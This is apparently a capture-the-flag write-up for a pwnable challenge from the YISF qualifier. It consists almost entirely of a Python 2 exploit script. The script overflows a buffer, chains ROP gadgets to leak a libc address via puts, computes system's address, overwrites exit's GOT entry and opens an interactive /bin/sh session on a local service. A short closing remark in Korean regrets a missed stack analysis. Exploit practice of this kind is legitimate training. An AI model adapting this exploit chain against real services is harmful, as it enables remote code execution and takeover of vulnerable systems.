YISF QUAL PWNABLE WRITE UP

#!/usr/bin/python
 
from socket import *
from struct import *
from time   import sleep
 
# Utils
p = lambda x : pack("<L",x)
up= lambda x : unpack("<L",x)[0]
 
# Functions
read = 0x10710
puts = 0x1054c
 
# Data
exit_got = 0x2128c
exit_plt = 0x10570
__libc_main_start_got = 0x21284
__libc_main_start_glibc = 0
system_glibc = 0
data = 0x212b8
 
# Gadget
ppr = 0x109ac
#load_arg = 0x10f26
load_arg = 0x10f24
load_reg = 0x10f3c
 
# Payloads
p1 = ''
p1 += 'a'*172
p1 += p(ppr)
 
p2 = ''
p2 += p(0xdeadbeef)
p2 += p(load_reg)
p2 += p(puts) #pc
p2 += "A"*12
p2 += p(__libc_main_start_got)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)
 
p2 += "A"*28
p2 += p(load_reg)
p2 += p(read)
p2 += "A"*12
p2 += p(exit_got)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)
 
p2 += "A"*28
p2 += p(load_reg)
p2 += p(read)
p2 += "A"*12
p2 += p(data)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)
 
p2 += "A"*28
p2 += p(load_reg)
p2 += p(exit_plt)
p2 += "A"*12
p2 += p(data)
p2 += "CCCC"
p2 += "DDDD"
p2 += p(load_arg)
 
# Exploit
s = socket(AF_INET,SOCK_STREAM)
s.connect(('localhost',9999))
 
print len(p2)
 
raw_input("GO?")
 
s.send(p2+"\n");sleep(0.5);s.recv(1024)
s.send(p1+"\n");sleep(0.5);s.recv(1024)
s.send("6\n");sleep(0.5)
 
l = s.recv(1024).split("bye\n")[1]
__libc_main_start_glibc = up(l[:4])
print "[+] __libc_main_start : "+hex(__libc_main_start_glibc)
__libc_main = __libc_main_start_glibc - 0x1680c # offset
system_glibc = __libc_main + 0x2c770
print "[+] System Offset Calculated : "+hex(system_glibc)
 
s.send(p(system_glibc)+"\n");sleep(0.5)
s.send("/bin/sh\n")
 
print "[*] SHELL"
while 1:
        s.send(raw_input("$ ")+"\n");sleep(0.5)
        print s.recv(1024)
 
s.close()

대회 때 왜 스택의 구조를 제대로 못 살폈을까..ㅠ

자괴감 든다